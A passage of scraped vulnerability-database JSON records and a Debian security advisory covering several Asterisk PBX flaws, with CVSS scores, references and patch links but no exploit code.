        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "155434",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-03059",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4526",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4421",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1291",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03059"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012588"
      },
      {
        "db": "PACKETSTORM",
        "id": "155434"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1291"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18790"
      }
    ]
  },
  "id": "VAR-201911-0701",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03059"
      }
    ],
    "trust": 0.948297215
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03059"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:52:07.567000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "AST-2019-006",
        "trust": 0.8,
        "url": "http://downloads.asterisk.org/pub/security/AST-2019-006.html"
      },
      {
        "title": "Security Advisories",
        "trust": 0.8,
        "url": "https://www.asterisk.org/downloads/security-advisories"
      },
      {
        "title": "[SECURITY] [DLA 2017-1] asterisk security update",
        "trust": 0.8,
        "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
      },
      {
        "title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Denial of Service Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/196959"
      },
      {
        "title": "Sangoma Technologies Asterisk  and Sangoma Technologies Certified Asterisk Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=103433"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03059"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012588"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1291"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-862",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012588"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18790"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "https://www.asterisk.org/downloads/security-advisories"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
      },
      {
        "trust": 1.6,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18790"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18790"
      },
      {
        "trust": 0.8,
        "url": "https://web.archive.org/web/20131208091355/http://securityadvisories.dlink.com/security/publication.aspx?name=sap10005"
      },
      {
        "trust": 0.6,
        "url": "https://seclists.org/fulldisclosure/2019/nov/18"
      },
      {
        "trust": 0.6,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
      },
      {
        "trust": 0.6,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
      },
      {
        "trust": 0.6,
        "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html   second message url unavailable at time of publishing"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4526/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/asterisk-information-disclosure-via-sip-peer-ip-address-change-30935"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155434/asterisk-project-security-advisory-ast-2019-006.html"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2019-006.html"
      },
      {
        "trust": 0.1,
        "url": "https://issues.asterisk.org/jira/browse/asterisk-28589"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-006-16.diff"
      },
      {
        "trust": 0.1,
        "url": "http://www.asterisk.org/security"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-006-13.diff"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-006-17.diff"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-006-13.21.diff"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2019-006.pdf"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03059"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012588"
      },
      {
        "db": "PACKETSTORM",
        "id": "155434"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1291"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18790"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03059"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012588"
      },
      {
        "db": "PACKETSTORM",
        "id": "155434"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1291"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18790"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-01-21T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-03059"
      },
      {
        "date": "2019-12-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012588"
      },
      {
        "date": "2019-11-21T23:02:22",
        "db": "PACKETSTORM",
        "id": "155434"
      },
      {
        "date": "2019-11-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1291"
      },
      {
        "date": "2019-11-22T17:15:11.740000",
        "db": "NVD",
        "id": "CVE-2019-18790"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-01-21T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-03059"
      },
      {
        "date": "2019-12-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012588"
      },
      {
        "date": "2022-04-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1291"
      },
      {
        "date": "2024-11-21T04:33:34.090000",
        "db": "NVD",
        "id": "CVE-2019-18790"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1291"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Sangoma Asterisk and  Certified Asterisk Vulnerabilities related to lack of authentication",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012588"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1291"
      }
    ],
    "trust": 0.6
  }
}

var-201905-0637

Vulnerability from variot

asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote). asterisk Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. DigiumAsterisk is a set of open source telephone exchange (PBX) system software from Digium, USA. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR) and more. A security vulnerability exists in DigiumAsterisk version 13.10.0

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201905-0637",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "digium",
        "version": "13.10.0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-16531"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009339"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-7550"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:digium:asterisk",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009339"
      }
    ]
  },
  "cve": "CVE-2016-7550",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2016-7550",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2019-16531",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2016-7550",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2016-7550",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2016-7550",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2019-16531",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201905-972",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-16531"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009339"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-972"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-7550"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote). asterisk Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. DigiumAsterisk is a set of open source telephone exchange (PBX) system software from Digium, USA. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR) and more. A security vulnerability exists in DigiumAsterisk version 13.10.0",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-7550"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009339"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-16531"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-7550",
        "trust": 3.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009339",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-16531",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-972",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-16531"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009339"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-972"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-7550"
      }
    ]
  },
  "id": "VAR-201905-0637",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-16531"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-16531"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:58:40.526000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "AST-2016-006",
        "trust": 0.8,
        "url": "http://downloads.asterisk.org/pub/security/AST-2016-006.html"
      },
      {
        "title": "Patch for DigiumAsterisk Denial of Service Vulnerability (CNVD-2019-16531)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/163053"
      },
      {
        "title": "Digium Asterisk Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92924"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-16531"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009339"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-972"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-476",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009339"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-7550"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "http://downloads.asterisk.org/pub/security/ast-2016-006.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7550"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-7550"
      },
      {
        "trust": 0.6,
        "url": "https://web.nvd.nist.gov//vuln/detail/cve-2016-7550"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-16531"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009339"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-972"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-7550"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-16531"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009339"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-972"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-7550"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-06-05T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-16531"
      },
      {
        "date": "2019-06-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-009339"
      },
      {
        "date": "2019-05-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201905-972"
      },
      {
        "date": "2019-05-23T19:29:00.243000",
        "db": "NVD",
        "id": "CVE-2016-7550"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-06-05T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-16531"
      },
      {
        "date": "2019-06-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-009339"
      },
      {
        "date": "2019-05-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201905-972"
      },
      {
        "date": "2024-11-21T02:58:11.820000",
        "db": "NVD",
        "id": "CVE-2016-7550"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-972"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "asterisk In  NULL Pointer dereference vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009339"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "code problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-972"
      }
    ],
    "trust": 0.6
  }
}

var-202312-1059

Vulnerability from variot

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa. Digium of Asterisk Classic buffer overflow vulnerabilities exist in products from multiple vendors.Information is tampered with and service operation is interrupted (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq

Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033

Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.

CVE-2023-38703

PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.

CVE-2023-49294

It is possible to read any arbitrary file even when the `live_dangerously`
option is not enabled.

CVE-2023-49786

Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.

For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.

We recommend that you upgrade your asterisk packages.

For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202312-1059",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "asterisk",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "20.5.0"
      },
      {
